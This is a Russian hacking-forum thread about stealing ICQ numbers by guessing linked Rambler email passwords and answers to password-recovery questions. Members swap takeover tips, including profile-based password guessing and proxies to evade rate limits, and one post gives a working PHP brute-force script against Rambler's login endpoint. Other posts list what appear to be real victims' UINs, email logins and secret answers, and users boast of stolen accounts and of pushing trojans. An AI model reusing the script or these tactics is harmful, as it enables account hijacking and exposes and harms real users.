Здраствуйте.
Сегодня всё-таки появилось моё видео, в котором я делаю введение по угону icq номеров с помощью Социальной Инженерии.
Видео качаем здесь (http://video.antichat.ru/file222.html)
Если Вас заинтерисует продолжение и развитие темы, то будут ещё визуалхаки.
Вообщем качайте, комментируйте критикуйте.
Спасибо.

оч интересно, хочется продолжение
+1

Хорошее видео. Но в последнее время при смене паса на мыле, не меняется пасс на аське, но это не везде так.

ну вообще там написано, что кроме брута есть способы, так это имхо ты и показал брут, только ручной =\

Но в последнее время при смене паса на мыле, не меняется пасс на аське
для этого и ввёл первый раз "неправильный" %)
GreenBear акцент на то, что мы проникаем в сознание жертвы %) там описан подход, составление списка паролей это уже СИ. Брут не может анализировать.
Брут не принимает решения %) Вообщем это только введение %)

вообще то ты просто берешь стандарный подход брутера - password = login с некоторым сокращениями
реализовать это не состовляет труда, тем самым дав бруту интелект с. инженеринга? ) класс, ии курит в сторонке.
так что я останусь при своем имхе что ты юзал ручной брут )

GreenBear не-не не так. Начинаем сначала бонально: login = password, далее сокращения, вытекающие из icq профиля информация и т.д.
Далее переходим к ответам на вопросы:
Ваше любимое число? - подставляем асю, дату рождения и т.д.
Ваш любимый город? - в профиле icq глянули
Имя Вашей кошки или собаки? - можно прикинуться и спросить.
Вообщем это не механика, коим является брут.
На видео показал, откуда можно пароли дыбать, в комментах так же написано.
Для видео нужен был хэк, Вы его увидели, ничего сложного нет.
У брута нету развития схемы - СИ действуем по обстановке.
Вообщем спасибо за мнение, буду стараться показать нечто нестандартное.

Солидарен с GreenBear. Больше и сказать нечего.
Ты просто подбираешь пароль, как брут.

гуд, но вероятность, что повезет 50 на 50

автор, много асек увел таким способом?

Ты просто подбираешь пароль, как брут.
18 дней на форумах, брут прошёлся взад и вперёд, а у меня списочком номера ходят.
Ты - брут, спасибо. NOmeR1 лично тебе:
знаешь, как мной был угнан номер 88-55-25? По ответу на контрольный вопрос, номер мне очень приглянулся, подбирал долго, но помог не перебор, а глупость хозяина.
Знаешь, почему я в комментариях в видео написал меняйте сначала ответ на вопрос?
Потому что у меня был и мыло и номер 100067, когда я начал делать ретрив, автор сменил пароль через ответ на вопрос. Моя глупость послужила мне уроком.
960005 - угнан исходя из инфы, находящейся в номере.
Я могу этот список продолжать долго. (если тебя интерисует, я тебе в асе индивидуальнос делаю) Я взламываю не ради корысти, а ради удовольствия. Брут не для меня. Это слишком бонально.
Если ещё после этого ты мне скажешь, что я подбираю пароль как брут, я тебе отвечу:
ты ведёшь себя на форуме как бот.
NOmeR1 иди запиши своё видео, покажи мне, что ты умеешь, а потом лезь в мой топ, со своей личной неприязнью ко мне, после того, как я показал всем лицо Атомика, твоего друга.

ой вру :( привязку сменили но пасс к мылу подобрал мля :(

А когда ты видео снимал? Сейчас не работает возврат паса при смене пароля на рамблер- мыле. (во всяком случае у меня).
Список номеров приложеный к видео не полный :) моего нету :), + это не ПМ к номерам а привязка, у номера может быть совсем другой ПМ, и его вернут за 1 сек!
PS Ещё хотел сказать, что такими вещами занимались ооооочень давно , но более продуктивние и автоматизировано, с помощью брута. Когда работал ретрив на 6-7-8 значные номера, можно было прям по онлайн базе делать выборку по маске на любое например мыло (killer), затем номера запихнуть в брут и пассы поставить различные вариатции на это слово (killer13..... и тд ) Я тебя уверяю результат был гарантирован :)
PSS Попробуй своим ручным брутом достать пятизнак, на асечке валяется список привязаных пятизнаков к Рамблеру :)

А когда ты видео снимал? Сейчас не работает возврат паса при смене пароля на рамблер- мыле. (во всяком случае у меня).
Внимательнее пожалста. Специально в видео в блокноте дату поставил и время.
Я уже писал, работает не всегда, но вот видишь, сработало.
Список номеров приложеный к видео не полный
это обсуждали в соответствующем разделе
+ это не ПМ к номерам а привязка, у номера может быть совсем другой ПМ, и его вернут за 1 сек!
да? это теория или Вы угнали столько же привязанных номеров, сколько их угнал я?
но более продуктивние и автоматизировано
опровергаю данное высказывание
maxster не воспринимай пожалуйста лично, ибо разгорячил меня один товарищ...
По поводу угона пятака отвечу: 100067 стоил бы больше, чем корявый пятизнак, и сейчас у меня проклёвывается ещё одна элитка...

На контактный адрес, который Вы указали ранее, выслано письмо с информацией о том, как задать новый пароль для Вашего имени на Рамблере.

Вы сможете воспользоваться высланным письмом в течение 48 часов.
И че теперь

Lander ответ подобрал, молодец, но при регистрации хозяин указаль альтернативный е-мейл, на который отправляется письмо.
С этим ни как. Удачи.

На контактный адрес, который Вы указали ранее, выслано письмо с информацией о том, как задать новый пароль для Вашего имени на Рамблере.

Вы сможете воспользоваться высланным письмом в течение 48 часов.

в инфе был прописан контактный адрес - забивай на контрольный вопрос.

Social Engineer, извини, поалуйста, что полез в твой топ.
Ты знаешь то такое брут? Брут - это перебор. Ты в своём видео показал, как надо угнать номер, перебирая пароль к мылу, привязаннму к нему. После смены пароля на мыле, пароль меняется на номере.
Минусы видео:
1) Нету сосредоточения на главном.(половина видео идёт о другом)
2) Нету сопровождения коментариями.(читателю всегда приятно узнать о том, что ты делаешь в данный момент, многие могут не понять)
Ты показал ещё один способ угона номера. Это промежуточное между СИ и БРУТОМ, поэтому спор мы не решим.

Как избавиться от привышен лимит запросов на восстановление пароля

юзать прокси

Ты знаешь то такое брут?
А ты знаешь, что такое брут?
Ты в своём видео показал
я знаю, что я показал, ты говоришь о том, что ты увидел.
После смены пароля на мыле, пароль меняется на номере.
Серьёзно? Куча номеров, на которых пароль из мыла такой же как и пароль для аси (но не login=pass)
Минусы видео:
это твоё мнение, ога?
1) Нету сосредоточения на главном.(половина видео идёт о другом)
В видео показан принцип. СИ для тех, у кого голова варит.
2) Нету сопровождения коментариями.(читателю всегда приятно узнать о том, что ты делаешь в данный момент, многие могут не понять)
По этому поводу всё чётко и отмечено, сначала рекомендую почитать, а потом посмотреть.
Это промежуточное между СИ и БРУТОМ
это твой вывод, ога?
поэтому спор мы не решим.
Кто с тобой спорит? мой пост #13, я тебе всё сказал предельно чётко и ясно, если ты не увидел СИ - твоя проблема. Брут не вытаскивает всю возможную информацию.
По поводу того что я показал: показал я, люди начали пробовать, что-то делать, а не продолжать тупые неосмысленные копи-пасты с форума.
IPD заставить работать для многих проблема, у многих результатов нет. А те у кого голова есть, получат результат данным способом.
Да и что это я вовсе? Человек мне говорит о СИ, а сам ниразу, думаю, не зделал данный хек.
Теоретики? Да, это хорошо, но я уже жксперементально опроверг:
+ это не ПМ к номерам а привязка, у номера может быть совсем другой ПМ, и его вернут за 1 сек!

/me гордится собой. пока все спорят написал чекер с ИИ и начал чекить все мыла из листа. если что соберет, то me выложит это в халяве

Любопытное и интересное видео... Нужна как-нибудь попробовать

мда судя по всему на рамлере никаких ограничений на логин по поп3 и с веба нету =)
и они сделали еще такую удобную фишку при логине через веб, прям спецом для брутеров, чтобы трафа было как можно меньше и соотвественно скорость =))
молодцы они =))

А что такой перебор именно для Рамблера или для Mail.ru тоже прокатит?

А что такой перебор именно для Рамблера или для Mail.ru тоже прокатит?
да. ет хоть в гондурасе прокатит.

тема хорошая, к одному мылу ответ подобрал, но вот беда.. пасс ушёл на другое мыло жертвы. чаще всего вопрос - девичья фамилия мамки, спрашивать в разводе как то подозрительно будет

натйе =) чекайте брутером с ИИ

<?php
set_time_limit(0) or die('mda');

$f = fopen('icq.text', 'r') or die('file not exists');
while(!feof($f)){
$data = rtrim(fgets($f));

$email = explode(';', $data);
$email = $email[1];
$email = explode('@', $email);
$email = $email[0];



$password = array(
'password',
'password1',
'qwerty',
'123456',
'abc123',
'monkey',
'blink182',
'qazwsx',
'asddfg',
'zxcvb',
'123qwe',
'qwe123'

);


$new_password = explode('@', $email);
$password = array_merge($password, $new_password);
$new_password = explode('.', $password[1]);
$password = array_merge($password, array($new_password[0]));
$new_password = preg_replace('/\d/i', '', $email);
$new_password = explode('@', $new_password);
$new_password = $new_password[0];
$password = array_merge($password, array($new_password));
foreach($password as $pass){
if($pass){

if(check_pass($pass)){
break;
}
}
sleep(1);

}






}
fclose($f);die('Results writed to good');

function check_pass($pass){
global $email;
$cp = fsockopen('mail.rambler.ru', 80, $errno, $errstr, 10) or die('ramlber.ru is down =\ ');
$r = "GET /script/auth.cgi?login=$email&passw=$pass HTTP/1.1\r\nHost: mail.rambler.ru\r\n\r\n";
fputs($cp, $r);
$str = fgets($cp);
$i++;
if(stristr($str, '302')){
$good = fopen('good', 'a');fwrite($good, $email.':'.$pass."\n");fclose($good);
echo 'found...'.$email.'<br>';
return true;
}else{
$bad = fopen('bad', 'a');fwrite($bad, $email.':'.$pass."\n");fclose($bad);
}
fclose($cp);

return false;

}


?>

на код не обращайте внимания, в начала он был для поп3 =)

GreenBear я конечно уважаю, но тема не про это, здесь я пытаюсь научить людей думать и ломать ручками. По поводу брута:
Brute-force - метод перебора паролей грубой силой.
Брут берёт колличеством.
Ай, что я распинаюсь, делайте копи-пасты и брутьте дальше.

Вообщем не надо это Вам, значит больше не буду тратить ни своё время ни Ваше.
Для тех, кому было интересно продолжение, я расскажу и покажу:
С помощью всё той же СИ мы проникаем в сознание жертвы и получаем этот номер (для особо непонятливых у меня был пароль и я привязал номер к рамблеру)
http://img209.imageshack.us/img209/8646/66666665ss9.png (http://imageshack.us)
Но я не алчный и взлом для меня - это искусство, а не способ наживы. Поэтому номером я не завладел окончательно, я решил поиграть с хозяином и заснять видео, как я получу номер ещё раз, думаю у меня это получилось бы...
Ну что ещё сказать, господа крутые хакеры, Вы круче всех.
Тем кому всё-таки понравилось и было интересно: извините, но желание напрочь отпало делиться знаниями и умениями. В разделе 8 модераторов, может они Вас чему-нибудь научат...
Спасибо.

GreenBear я конечно уважаю, но тема не про это, здесь я пытаюсь научить людей думать и ломать ручками. По поводу брута:
Brute-force - метод перебора паролей грубой силой.
Брут берёт колличеством.
Ай, что я распинаюсь, делайте копи-пасты и брутьте дальше.
вообще у меня там лишь пароли созданые из логина как можно заметить =) + несколько популярный, так что =\

Social Engineer, а мне понравился твой визуал хак.. оч познавательно, смог угнать 1 шоху..
лови + вобщем)) и не обращай внимания на этих брутеров, просто они считают, что их "гениальный" моск сможет придумать еще один пасс на который они снимуть парочку другую десятков шох и семерок..
хотя в общем то оба метода похожи, нужно думать и соображать головой, причем достаточно изобретательно..

А есть какойнить брут для рамблеровских мыл?

Мда.. из серии угадай пароль к мылу. На везение и на терпение. =\
>>8 модераторов, может они Вас чему-нибудь научат...
Модератор в переводе с немецкого означает ведущий, а не учитель. лол =)

Вот 7 ки рамблеровские
http://slil.ru/24303710
Пароль antichat

Пасс на мыло я нашел.Зашел на мыло,а мыло не прямое.Зато там есть письма от регистрации его аски.Это чтонить дает?.И вообще эта аська точно его.Тока он наверно от раблера отвязал ее.Ктонить знает что делать?

Social Engineer
реально достаточно интересный подход

А что делать если рамблеру не понравилось что от меня много запросов на востановление пароля.
Ждать 2 часа как то не вариант...

А что делать если рамблеру не понравилось что от меня много запросов на востановление пароля.
Ждать 2 часа как то не вариант...
Прокси

2 социальный инженер греат респект!!! угнал красивый номерок за 3 минуты! лови + к репе!!

5 ти знаки на Рамблере
http://slil.ru/24307020
Пароль antichat

Это канешна круто,но мож у тебя 9тки есть? чисто для практики.

Lander базы всех номеров выкладывались на форуме.
_eXe_ базы девяток на данный момент нет
Constantine и все остальные, которые высказывают недовольство моим поведением, ещё раз повторю, моя ася на виду, стучите, обсудим. Constantine к тебе я сам стукнул.
На личность я пока на одну перешёл, перешёл потому, что она перешла на меня, каждому своё место. Можете показать мне моё. Ога?
Да этот инженер долбоеб просто, не обращай внимания, выебываеться по случаю подбора пароля к мылу
ты дол**еб чтоли? четы ведешь себя как быдло и на личности переходишь. хамло ипанутое =\
Constantine я на твою личность переходил? Тебе личо слово сказал? Если наши взгляды не сходятся, то я дол**еб? вообщем давай в асе обсудим.
NOmeR1 так же прошу стукнуть ко мне в асю.
Давайте к этому вопросу на форуме возвращаться не будем, ибо итак хватает разногласий и всего прочего, ася есть, всё можно решить.
Спасибо.

Народ у меня проблема =(.Значит на мыло я попал изменил все данные мыла как на видео.Аська привязана к этому номеру так как показано что ваш номер icq тот что и нужен.Как пароль то аську узнать??? Тот который я поставил на мыло не подходит.

Народ у меня проблема =(.Значит на мыло я попал изменил все данные мыла как на видео.Аська привязана к этому номеру так как показано что ваш номер icq тот что и нужен.Как пароль то аську узнать??? Тот который я поставил на мыло не подходит.
забивай на мыло. привязка на нем не работает..

Если номер привязан к мылу,значит пароль и на мыле и на уине оденаковый,если нет,попробуй ретрив.

Если номер привязан к мылу,значит пароль и на мыле и на уине оденаковый,если нет,попробуй ретрив.
Необязательно. Если сменить на асе, то на мыле не изменится, а если на мыле сменить, то если ниче глючить не будет у мираблов или рамблера, и на асе тот же станет

_eXe_
Может была еще привязка на другое мыло?

_eXe_ стукнул в асю.
пароль на асю с помощью этого мыла выудить не получится.
это скорее всего вызвано тем, что пароль менялся в icq клиенте после изменений в рамблере.
Кто ищет, тот всегда найдёт. Дерзайте.

А есть база семерок тока под яндех.?

_eXe_ нет в паблике базы только привязок к рамблеру.
Это не то же самое, что база ПМ.

Способ меня заинтересовал. Я решил попробовать и смог отгадать ответ на секретный вопрос.... так вот мой вопрос: что делать дальше? :)
Я попробовал ответ на секретный вопрос поставить в логин на рамблер - куй, попробовал залогиниться на асю - куй...
В файле

Далее у любого почтового сервиса есть функция восстановления пароля у рамблера она заключается в ответе на вопрос. Зачастую этим так же принебрегают, но это ещё одна лазейка для взлома, потому что ответ на секретный вопрос зачастую ставится незамысловатый и легкозапоминающийся. Так же ответ на вопрос можно найти в информации уина, который привязан к этому мылу
А что дальше? :)

Пардон.. но на мыло вышла инструкция по смене пароля, а это палево :) На мыло зайти не получается :(

В ходе дальнейшего перебора удалось подобрать пароль к другому мылу (от другого номера) все было сделано как на видеозаписи.. но есть проблемка...
Как я понял пароль на мыло аналогичен паролю на асю, следовательно поменяв пароль е-меила на новый, я могу свободно вводить его при логине в асю... ан нет... пишет пароль при логине в асю не верен.. ввожу старый пароль - пароль не верен...
Получается что мыло у меня полностью в руках, а номер нед. Что делать? :(
Через icq/password сменить ничего не получилось, мыло не то, а может там и не надо?

ЗЫ. Способ очень хорошь, так как идет более глубокое мылшение над паролем.. это интересно и на любителя, что касается брута - попробуй сначала подбери диапазон, а потом примерный пароль на него... и жди в ожидании сутки... может быть и ничего не подойдет, а тут вот посидел часик.. и шестерка почти в руках :)

mazafaker Спасибо.
Всё верно. Только не на всех мылах работает и не на всех пароли одинаковые, но кто ищет, тот всегда найдёт.
Удачи.

Была аналагичная проблема.Причем два раза уже.Но один номер я всеже утянул.Ответил на сикретный вопрос-Ваш любимый город.Нашел поиском владельца аси им оказалась баба.Место рождения и проживания город Казань.Ввел все подошло.Ася моя.Способ угона рабочий тока очень нудный и неэффективный.Причем все легко угоняемые уже угнали.

Причем все легко угоняемые уже угнали.
Не сказал бы... Всегда есть куча наивных юзеров которые покупают шохи или семеры в магазинах, и ставят до предела идиотские пасы и вопросы))))

Ух спасибо большое еще раз Social Engineer. Открыл новый способ взлома для меня ;)
Снял номер 19Х-ХХ9 ;)
Девушки в большинстве случаев абсолютно не думают о безопасности, храня пароли прямо в названии e-maila :P

Согласен с xAntifa_GuYx. Проверять стоит всегда, кроме тех, которые без инфы.. а то ломаешь-ломаешь.. ломаешь-ломаешь.. а номер до тебя уже сперли ;)

_eXe_, xAntifa_GuYx, mazafaker спасибо Вам.
Я о том и толкую, что это и проще и интереснее, да и какое удовольствие, когда стянешь.
Ну начали бы вы брутить шестёры, сбрутили бы что-нибудь? А то тут дяди заплевали меня сильно, иди со своими видео лесом, мы всё знаем нам ничо не надо.
Если смекалко работает, то шестизнак утянуть никогда не проблема, а подарок ето хороший))
Вообщем отписывайтесь в топе, кто как гонял, какие вопросы подбирали, из какой инфы и т.д.
СИ решает.

А я отыскал свой номер в базе правда у меня не такое мыло :-d

Мне позувчера стукнул в асю какой то 14 летний лолег с шохи XYZA. Я думаю а че бы не попробовать)) Пошел делать ретрив.. Там стоят вопросы, Имя животного.. И любимая команда...
Узнавши из инфы что любит лабать КС а на аватарке у него пингвинчик LINUXa я вбил все это туда))) И вуаля, шоха у меня :))))

279482;ska4ok@rambler.ru
Пароль на мыло - дата рождения, указанная в инфо... захожу на мыло.. а там вижу кривой девятизнак :(
Походу кто-то до меня спер шоху :(

И вот сегодня снова случай был, подобрал пароль к мылу, а к аське он не подходит :( Номерок красивый Х77У33

Эти три можно вычеркнуть, пассы не подходили : )
121739;korsergeiko2005
562559;foramber6
293456;nastya.voronova
a:hj14js2d
p:d3Vsf1F3

С этих идёт ретрив пароля на другой мыльник, гуглить влом : )
646319;malenkij1982
a:Питер

659369;natalia.bogatova
a:Казань

659369;natalia.bogatova
a:Казань

Такое же мыло есть на маиле.Может её.

народ есть 6-ти знаки какие то?

VivaLaMax, У тебя - нет=(

VivaLaMax археолог.
ты какой шестизнак в виду имеешь?

СИ рулит там где брут невозможен ;)

я троев в свое время впаривал по асе с помощью СИ, просто был индивидуальный подход к каждому )

И по мылу тоже чепуху писал незнакомым людям на примаки, итого 2е шохи и несколькой 7ми знаков ), но целью не ставил угон номеров красивых... надо было наказать отдельныно взятых личносмтей или вывести на чистю воду маскирующихся челов, сбор о них информации )

по моему чисто СИ очень трудно что либо ломать, надо совмещять СИ + вири, СИ + брут и т.д.

P.S.
моя статистика))) среди девушек в возрасте 14-19 лет очень популярны пароли в виде даты рождления и ников ) это примерно 1-3 аси из 10 вышеописанных

Но это как пример, у бесзащитных девушек аси не воруйте, это аморально

троя впарить можно любому,только почти у всех антивирь включен((((((

Здраствуйте.
Сегодня всё-таки появилось моё видео, в котором я делаю введение по угону icq номеров с помощью Социальной Инженерии.
Видео качаем здесь (http://video.antichat.ru/file222.html)
Если Вас заинтерисует продолжение и развитие темы, то будут ещё визуалхаки.
Вообщем качайте, комментируйте критикуйте.
Спасибо.


Перезалейте, пожалуйста, видео. Спасибо)

у меня не качает видео =( перезалей

у меня был самопальный (на ачате его коды на делфи были) он не палился антивирусами ) но щас квипы новых версий и асю шестую не тащит(((((

у меня не качает видео =( перезалей
Дату того сообщения смотри... 27.04.2007, 21:03 ))